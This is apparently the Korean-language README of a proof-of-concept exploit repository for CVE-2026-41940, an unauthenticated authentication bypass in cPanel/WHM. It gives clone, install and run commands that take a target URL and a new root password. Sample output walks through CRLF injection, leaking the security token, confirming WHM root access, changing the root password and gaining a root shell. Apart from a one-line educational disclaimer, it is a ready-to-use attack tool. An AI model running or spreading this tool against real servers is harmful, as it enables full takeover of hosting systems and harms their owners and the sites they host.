
# CVE-2026-41940 개념 증명 익스플로잇 CRLF 주입을 사용하여 보안 토큰을 유출하고 루트 비밀번호를 재설정하는 cPanel/WHM의 인증되지 않은 인증 우회 취약점에 대한 개념 증명 익스플로잇입니다.
CVE-2026-41940은 cPanel/WHM을 대상으로 하는 개념 증명(PoC) 익스플로잇입니다.
이 익스플로잇은 CRLF 인젝션을 사용하여 보안 토큰을 유출하고 WHM 인터페이스에 대한 루트 수준 접근 권한을 획득하는 인증되지 않은 인증 우회를 시연하며, 루트 비밀번호 변경과 같은 작업을 수행할 수 있게 합니다.
면책 조항: 이 PoC는 교육 목적으로만 제공됩니다. 허가 없이 시스템에 사용하지 마십시오.
cp_security_token을 유출합니다.requests 라이브러리로 작동합니다.git clone https://github.com/Rosemary1337/CVE-2026-41940.git
cd CVE-2026-41940
pip install requests
요구 사항:
requests,urllib3
python3 CVE_2026_41940.py --target <TARGET_URL> --password <NEW_PASSWORD>
python3 CVE_2026_41940.py --target https://target.com:2087 --password MyNewRootPass123!
콘솔에 다음이 표시됩니다:
[0-4][+][!][*]예시:
[0] hostname = target.local
[1] minting a preauth session...
session base = :XLNfFj4XjKuS4f9V
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
HTTP 307, leaked token = /cpsess0555762073
[3] firing do_token_denied to propagate raw -> cache...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.110.0.12"}
[*] changing the root password
passwd -> HTTP 200
[+] now just login to https://target.com:2087 and use the terminal option to get a root shell
| 플래그 | 설명 | 필수 | 기본값 |
|---|
--target | WHM 대상 URL (예: https://host:2087) | 예 | - |
--password | 루트 사용자의 새 비밀번호 | 예 | - |
--hostname | Host: 헤더 재정의 | 아니요 | 자동 |